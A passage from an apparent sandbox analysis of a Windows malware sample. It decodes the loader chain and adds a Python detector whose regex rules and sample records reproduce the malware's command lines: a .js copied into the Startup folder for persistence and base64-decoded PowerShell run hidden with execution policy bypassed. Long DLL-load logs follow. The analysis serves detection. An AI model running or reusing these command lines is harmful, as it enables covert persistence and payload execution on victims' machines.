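    print(comspec_chars([4, 15, 25]), "<- $env:COMSPEC[4,15,25] -join ''")
    print(decode_unicode_base64(CODIGO_PREFIX), "<- start of the decoded $Codigo")
    for cmd in (FORMAT_CMD, REPLACE_CMD):
        stage2 = unwrap_layer1(cmd)
        print(stage2)
        print(extract_iocs(stage2))
```

Both variants rebuild to the same stage-2 script: fetch a base64 text from the raw.githubusercontent.com URL, decode it, hand the bytes to `[Reflection.Assembly]::Load`, and `Invoke-Expression` a call to `[dnlib.IO.Home]::VAI` whose arguments are a reversed paste.ee URL, a drop directory under `C:\ProgramData\`, a name, and a .NET host process name (`AddInProcess32` in one variant, `AppLaunch` in the other). Each character the obfuscation tries to keep out of the command line (`'`, `\`, `$`, `"`) is reintroduced by a `[char]` code, which is why a decoder only needs the `[char]` values, the fragment joiner and the operator at the end.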
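The signatures listed for this sample (ping used as a sleep, a script dropped into the Startup folder, wscript.exe starting cmd.exe and PowerShell, `-windowstyle hidden -executionpolicy bypass`, base64-decoded command text) all fall out of the parent/child records above. The following Python is an added example, not part of this report or of any Sigma rule: it rebuilds the parent/child pairs from `Source: ... Process created: ...` lines and scores each command line against a handful of rules whose names are the example's own. Its sample records are copies of lines from this page, with the `$Codigo` blob abridged to `<b64>`; the `AcroCEF.exe` record with an `unknown` child is included to show that such lines are skipped.

```python
import re
from collections import defaultdict

# One report record: "Source: <parent image> Process created: <child image> <command line>".
# Image paths may contain spaces, so the child path is cut at its first ".exe".
REC_RE = re.compile(
    r"^Source:\s+(?P<parent>.+?)\s+Process created:\s+(?P<child>.+?\.exe)\s*(?P<cmd>.*)$", re.I)

# Command-line rules; the names are this example's own, chosen to mirror the signatures above.
RULES = {
    "ping_sleep": re.compile(r"\bping\s+127\.0\.0\.1\s+-n\s+\d+", re.I),
    "startup_folder_drop": re.compile(r"\\Start Menu\\Programs\\Startup\\", re.I),
    "script_from_public_dir": re.compile(r"\\Users\\Public\\.*\.js\b", re.I),
    "ps_hidden_bypass": re.compile(
        r"-windowstyle\s+hidden.*-executionpolicy\s+bypass"
        r"|-executionpolicy\s+bypass.*-windowstyle\s+hidden", re.I),
    "ps_base64_decode": re.compile(r"FromBase64String", re.I),
    "ps_iex": re.compile(r"Invoke-Expression|\biex\b|COMSPEC\[", re.I),
}
SHELLS = {"cmd.exe", "powershell.exe"}


def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def parse_records(lines):
    """Map parent image path -> [(child image path, command line), ...] in report
    order. Records whose child is 'unknown' have no command line and are skipped."""
    tree = defaultdict(list)
    for line in lines:
        m = REC_RE.match(line.strip())
        if m:
            tree[m["parent"]].append((m["child"], m["cmd"]))
    return tree


def evaluate(tree):
    """Return (parent image, child image, sorted rule hits) for every record that
    trips at least one rule. Only the wscript->shell rule needs the tree; the
    others look at the child's command line alone."""
    findings = []
    for parent, children in tree.items():
        for child, cmd in children:
            hits = [name for name, rx in RULES.items() if rx.search(cmd)]
            if image_name(parent) == "wscript.exe" and image_name(child) in SHELLS:
                hits.append("wscript_spawns_shell")
            if hits:
                findings.append((image_name(parent), image_name(child), sorted(hits)))
    return findings


# Copies of records from this page (the $Codigo blob abridged to <b64>).
SAMPLE_RECORDS = [
    # wscript.exe -> cmd.exe: ping as a sleep, then copy the .js into the Startup folder
    r"Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "
    r'"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command '
    r"[System.IO.File]::Copy('C:\Users\Public\Documents\2p_bee.js', 'C:\Users\' + "
    r"[Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')",
    # wscript.exe -> powershell.exe: UTF-16LE base64 decoded and fed to a hidden, bypass child
    r"Source: C:\Windows\System32\wscript.exe Process created: "
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '
    r"'<b64>';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));"
    r"powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD",
    r"Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10",
    r'Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe wscript.exe "C:\Users\Public\Documents\2p_bee.js"',
    r"Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown",
]

if __name__ == "__main__":
    for parent, child, hits in evaluate(parse_records(SAMPLE_RECORDS)):
        print(f"{parent} -> {child}: {', '.join(hits)}")
```

The rules deliberately key on the command line rather than on file names such as `2p_bee.js` or `sj.JJC.js`, which change between waves of the same campaign; the parent/child relation (wscript.exe launching cmd.exe or powershell.exe) is the one signal that survives any renaming, which is why it is computed from the tree rather than from a string match.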
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Section loaded: secur32.dll
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Section loaded: schannel.dll
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Section loaded: cryptnet.dll
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\cmd.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\cmd.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\cmd.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\cmd.exe Section loaded: wldp.dll
Source: C:\Windows\System32\cmd.exe Section loaded: propsys.dll
Source: C:\Windows\System32\cmd.exe Section loaded: profapi.dll
Source: C:\Windows\System32\cmd.exe Section loaded: edputil.dll
Source: C:\Windows\System32\cmd.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\cmd.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\cmd.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\cmd.exe Section loaded: netutils.dll
Source: C:\Windows\System32\cmd.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\cmd.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\cmd.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\cmd.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\cmd.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\cmd.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\cmd.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\cmd.exe Section loaded: slc.dll
Source: C:\Windows\System32\cmd.exe Section loaded: userenv.dll
Source: C:\Windows\System32\cmd.exe Section loaded: sppc.dll
Source: C:\Windows\System32\cmd.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\cmd.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe Section loaded: pcacli.dll
Source: C:\Windows\System32\cmd.exe Section loaded: mpr.dll
Source: C:\Windows\System32\cmd.exe Section loaded: sfc_os.dll
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winhttpcom.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe Section loaded: webio.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe Section loaded: schannel.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winhttpcom.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe Section loaded: webio.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: schannel.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: winnsi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: winnsi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: mswsock.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winhttpcom.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe Section loaded: webio.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe Section loaded: schannel.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: winnsi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
